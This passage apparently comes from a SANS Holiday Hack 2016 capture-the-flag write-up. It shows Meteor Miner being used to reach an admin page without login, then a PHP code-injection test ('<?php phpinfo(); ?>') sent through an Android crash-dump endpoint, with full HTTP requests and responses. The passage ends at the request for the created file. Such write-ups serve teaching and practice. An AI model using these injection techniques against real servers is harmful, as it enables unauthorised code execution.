&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;link&lt;/span&gt; &lt;span class="na"&gt;rel&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;stylesheet&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/css&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;__meteor-css__&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/d1281f37fbafb6db67a052e58c901679c5cabcc2.css?meteor_css_resource=true&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;charset&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf-8&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;http-equiv&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;X-UA-Compatible&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;IE=edge&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;viewport&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;width=device-width, initial-scale=1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="c"&gt;&amp;lt;!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags--&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;meta&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;description&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;Holiday Hack&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Ad Nauseam - Stupid Ads for Stupid People&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;

&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;&lt;span class="nx"&gt;__meteor_runtime_config__&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;decodeURIComponent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;));&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;text/javascript&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;src&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/fedc8e9f69dab9d81a4f227d6ec76567fcb56231.js?meteor_js_resource=true&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;What a crazy random happenstance, it just so happens that &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2016/12/06/mining-meteor"&gt;an article&lt;/a&gt;
about pentesting Meteor-based web applications was recently published on the
SANS blog.&lt;/p&gt;
&lt;p&gt;So, let's spin &lt;a class="reference external" href="https://tampermonkey.net/"&gt;Tampermonkey&lt;/a&gt;, with the &lt;a class="reference external" href="https://github.com/nidem/MeteorMiner/"&gt;Meteor
Miner&lt;/a&gt; script, to see what kind of
informations we can extract from the applications. On this screenshot, we can
see that we have access to the quotes printed on the front page:&lt;/p&gt;
&lt;img alt="ads_meteor_miner_front.png" class="align-center" src="/images/sans-christmas-challenge-2016/ads_meteor_miner_front.png" /&gt;
&lt;p&gt;We can also see that there's an &lt;a class="reference external" href="http://ads.northpolewonderland.com/admin/quotes"&gt;/admin/quotes&lt;/a&gt;
page:&lt;/p&gt;
&lt;img alt="ads_meteor_miner_admin_route.png" class="align-center" src="/images/sans-christmas-challenge-2016/ads_meteor_miner_admin_route.png" /&gt;
&lt;p&gt;If we go to it, even if we're supposed to be logged in, we can see that
there's one quote more than on the front page:&lt;/p&gt;
&lt;img alt="ads_meteor_miner_admin_page.png" class="align-center" src="/images/sans-christmas-challenge-2016/ads_meteor_miner_admin_page.png" /&gt;
&lt;p&gt;In one of these quotes, we can see that there's a link to the MP3 file we want.
We can then download the MP3 file from this URL: &lt;a class="reference external" href="http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3"&gt;http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3&lt;/a&gt;&lt;/p&gt;
&lt;img alt="ads_result.png" class="align-center" src="/images/sans-christmas-challenge-2016/ads_result.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="the-uncaught-exception-handler-server"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://ex.northpolewonderland.com/exception.php"&gt;The Uncaught Exception Handler Server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When the Android application encounters a Java exception, it's sent to an
exception handling server: &lt;a class="reference external" href="http://ex.northpolewonderland.com/exception.php"&gt;http://ex.northpolewonderland.com/exception.php&lt;/a&gt;.
For example, when I first tried to run the Santagram application on a virtual
Android device, this exception was sent (some problem with the resolution of
my virtual device):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;3860&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;WriteCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Canvas: trying to draw too large(113246208bytes) bitmap.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lmessage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Canvas: trying to draw too large(113246208bytes) bitmap.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;strace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;java.lang.RuntimeException: Canvas: trying to draw too large(113246208bytes) bitmap.\n\tat android.view.DisplayListCanvas.throwIfCannotDraw(DisplayListCanvas.java:260)\n\tat android.graphics.Canvas.drawBitmap(Canvas.java:1415)\n\tat android.graphics.drawable.BitmapDrawable.draw(BitmapDrawable.java:528)\n\tat android.widget.ImageView.onDraw(ImageView.java:1316)\n\tat android.view.View.draw(View.java:17185)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16167)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16162)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16162)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16162)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16162)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16162)\n\tat android.view.View.draw(View.java:16951)\n\tat android.view.ViewGroup.drawChild(ViewGroup.java:3727)\n\tat android.view.ViewGroup.dispatchDraw(ViewGroup.java:3513)\n\tat android.view.View.draw(View.java:17188)\n\tat com.android.internal.policy.DecorView.draw(DecorView.java:753)\n\tat android.view.View.updateDisplayListIfDirty(View.java:16167)\n\tat android.view.ThreadedRenderer.updateViewTreeDisplayList(ThreadedRenderer.java:648)\n\tat android.view.ThreadedRenderer.updateRootDisplayList(ThreadedRenderer.java:654)\n\tat android.view.ThreadedRenderer.draw(ThreadedRenderer.java:762)\n\tat android.view.ViewRootImpl.draw(ViewRootImpl.java:2800)\n\tat android.view.ViewRootImpl.performDraw(ViewRootImpl.java:2608)\n\tat android.view.ViewRootImpl.performTraversals(ViewRootImpl.java:2215)\n\tat android.view.ViewRootImpl.doTraversal(ViewRootImpl.java:1254)\n\tat android.view.ViewRootImpl$TraversalRunnable.run(ViewRootImpl.java:6337)\n\tat android.view.Choreographer$CallbackRecord.run(Choreographer.java:874)\n\tat android.view.Choreographer.doCallbacks(Choreographer.java:686)\n\tat android.view.Choreographer.doFrame(Choreographer.java:621)\n\tat android.view.Choreographer$FrameDisplayEventReceiver.run(Choreographer.java:860)\n\tat android.os.Handler.handleCallback(Handler.java:751)\n\tat android.os.Handler.dispatchMessage(Handler.java:95)\n\tat android.os.Looper.loop(Looper.java:154)\n\tat android.app.ActivityThread.main(ActivityThread.java:6119)\n\tat java.lang.reflect.Method.invoke(Native Method)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:886)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:776)\n&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;model&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Android SDK built for x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;sdkint&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;25&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;device&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;generic_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;product&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;sdk_google_phone_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lversion&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;3.10.0+&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapsz&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;123054440&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;119010712&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapszlimit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;536870912&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;natallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7198792&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;cpuusage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0.08108108&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;totalstor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1560133632&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freestor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;120262656&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;busystor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1439870976&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I got this response from the server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 26 Dec 2016 22:19:50 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;81&lt;/span&gt;

{
    &amp;quot;success&amp;quot; : true,
    &amp;quot;folder&amp;quot; : &amp;quot;docs&amp;quot;,
    &amp;quot;crashdump&amp;quot; : &amp;quot;crashdump-WgyLFG.php&amp;quot;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, apparently, a file &lt;code&gt;docs/crashdump-WgyLFG.php&lt;/code&gt; was created. That's
very interesting, because this means that we may be able to upload valid
PHP code to be executed. The first thing I did was try to put PHP code in
the exception, to see if it was executed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;429&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;WriteCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;lt;?php phpinfo(); ?&amp;gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lmessage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Message.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;strace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Stack trace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;sdkint&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;25&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;device&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;generic_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;product&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;sdk_google_phone_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lversion&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;3.10.0+&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapsz&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;123054440&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;119010712&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapszlimit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;536870912&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;natallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7198792&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;cpuusage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0.08108108&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;totalstor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1560133632&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freestor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;120262656&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;busystor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1439870976&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:27:39 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;81&lt;/span&gt;

{
    &amp;quot;success&amp;quot; : true,
    &amp;quot;folder&amp;quot; : &amp;quot;docs&amp;quot;,
    &amp;quot;crashdump&amp;quot; : &amp;quot;crashdump-yoerjb.php&amp;quot;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/docs/crashdump-yoerjb.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
